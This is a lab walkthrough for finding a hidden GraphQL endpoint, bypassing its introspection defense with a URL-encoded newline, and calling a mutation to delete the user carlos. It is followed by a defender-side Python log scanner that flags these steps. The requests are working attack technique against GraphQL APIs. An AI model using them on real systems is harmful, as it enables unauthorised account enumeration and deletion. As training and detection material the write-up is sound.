Lab: Finding a hidden GraphQL endpoint

The user management functions for this lab are powered by a hidden GraphQL endpoint. You won't be able to find this endpoint by simply clicking through the site. The endpoint also has some defenses against introspection.

To solve the lab, find the hidden endpoint and delete carlos.

Steps

  • Open Burp Suite and visit the target website.

  • Click on any GET request and send it to Intruder and Repeater.

  • Brute-force the path using the list below:

/graphql
/api
/api/graphql
/graphql/api
/graphql/graphql
  • In Repeater, send the following query to the /api endpoint:

GET /api?query=query%7B__schema%0A%7BqueryType%7Bname%7D%7D%7D
  • Switch to the GraphQL tab in Repeater.

  • Get all the available query type fields:

query{__schema
{queryType{fields{name description}}}
}
  • Get the available mutation type fields:

query{__schema
{mutationType{fields{name description}}}
}
  • Get the ID of the user carlos:

query{__schema
{queryType{fields{name description}}}
getUser(id:3)
{
	id
	username
}
}
  • Delete the user carlos using the mutation:

mutation{
	deleteOrganizationUser(input:{id:3})
	{
		user {id}
	}
}
  • Congrats! You have solved the lab

Note: To do this, you have to URL-encode the requests.
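As an added, defender-side example that is not part of the lab write-up: the steps above leave three things in a web server's access log, a burst of 404s on the candidate paths, an introspection query whose __schema is separated from { by a URL-encoded newline (%0A), and an anonymous call to deleteOrganizationUser. The Python below decodes the GET query string, strips whitespace before matching so the line-break form and the compact form are treated alike, and reports both the path probing and the sensitive calls. The log format, client IPs and the getUser traffic are constructed for this example; the candidate paths and the mutation name come from the write-up.

```python
"""Added example (not part of the lab write-up): spot the path brute-force,
the introspection query and the privileged mutation from the steps above
in web-server access logs, from the defending side.

Assumed, constructed log format: '<ip> "<METHOD> <path?query> HTTP/1.1" <status>'.
The candidate paths and the mutation name deleteOrganizationUser are taken
from the write-up; everything else is an assumption made for this example.
"""
import re
from collections import defaultdict
from typing import Dict, List, Optional, Tuple
from urllib.parse import parse_qs, urlsplit

# Endpoint paths from the brute-force word list in the write-up.
CANDIDATE_PATHS = {"/graphql", "/api", "/api/graphql", "/graphql/api", "/graphql/graphql"}

# Mutations that must never be reachable without authorisation (name from the write-up).
SENSITIVE_MUTATIONS = {"deleteOrganizationUser"}

LOG_RE = re.compile(
    r'^(?P<ip>\S+) "(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})$'
)


def extract_graphql_query(method: str, target: str) -> Optional[str]:
    """Return the percent-decoded GraphQL document from a GET ?query=... URL, or None.

    parse_qs does the URL decoding, so the %0A in the write-up's request comes
    back as a real newline here.
    """
    parts = urlsplit(target)
    if method != "GET" or parts.path not in CANDIDATE_PATHS:
        return None  # POST bodies are not in access logs; cover them at the gateway
    values = parse_qs(parts.query).get("query")
    return values[0] if values else None


def classify(query: str) -> List[str]:
    """Label one GraphQL document.

    Whitespace is stripped first, so a line break between __schema and {
    (the form used in the write-up) matches just like the compact form; the
    word boundary keeps the ordinary __typename field from matching.
    """
    compact = re.sub(r"\s+", "", query)
    findings = []
    if re.search(r"__(schema|type)\b", compact):
        findings.append("introspection")
    if compact.startswith("mutation"):
        for name in sorted(SENSITIVE_MUTATIONS):
            if name in compact:
                findings.append(f"sensitive-mutation:{name}")
    return findings


def scan_log(lines: List[str]) -> List[Tuple[str, str, str]]:
    """Return (client ip, endpoint path, finding) for every flagged request."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line: skip rather than abort the scan
        query = extract_graphql_query(m["method"], m["target"])
        if query is None:
            continue
        path = urlsplit(m["target"]).path
        for finding in classify(query):
            alerts.append((m["ip"], path, finding))
    return alerts


def path_probe_counts(lines: List[str]) -> Dict[str, int]:
    """Count, per client, distinct candidate endpoint paths that returned 404.

    Several such misses from one client in a short window is the footprint
    of the path brute-force step.
    """
    seen = defaultdict(set)
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m["status"] != "404":
            continue
        path = urlsplit(m["target"]).path
        if path in CANDIDATE_PATHS:
            seen[m["ip"]].add(path)
    return {ip: len(paths) for ip, paths in seen.items()}


# Constructed sample lines: a scanner finding /api, then reading the schema and
# calling the delete mutation, and an ordinary client using getUser.
SAMPLE_LOG = [
    '203.0.113.7 "GET /graphql HTTP/1.1" 404',
    '203.0.113.7 "GET /api/graphql HTTP/1.1" 404',
    '203.0.113.7 "GET /graphql/api HTTP/1.1" 404',
    '203.0.113.7 "GET /api HTTP/1.1" 400',
    '203.0.113.7 "GET /api?query=query%7B__schema%0A%7BqueryType%7Bname%7D%7D%7D HTTP/1.1" 200',
    '203.0.113.7 "GET /api?query=mutation%7BdeleteOrganizationUser(input%3A%7Bid%3A3%7D)%7Buser%7Bid%7D%7D%7D HTTP/1.1" 200',
    '198.51.100.4 "GET /api?query=query%7BgetUser(id%3A1)%7Busername%7D%7D HTTP/1.1" 200',
    '198.51.100.4 "GET /products HTTP/1.1" 200',
]

if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print("ALERT", *alert)
    print("probe counts:", path_probe_counts(SAMPLE_LOG))
```

Run over the constructed lines it reports the introspection query and the deleteOrganizationUser call from 203.0.113.7, and counts three missed candidate paths for that client; the legitimate getUser request is not flagged. The same normalisation belongs in any server-side introspection block: a check that looks only for the literal text __schema{ is what the line-break form in the write-up gets past.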
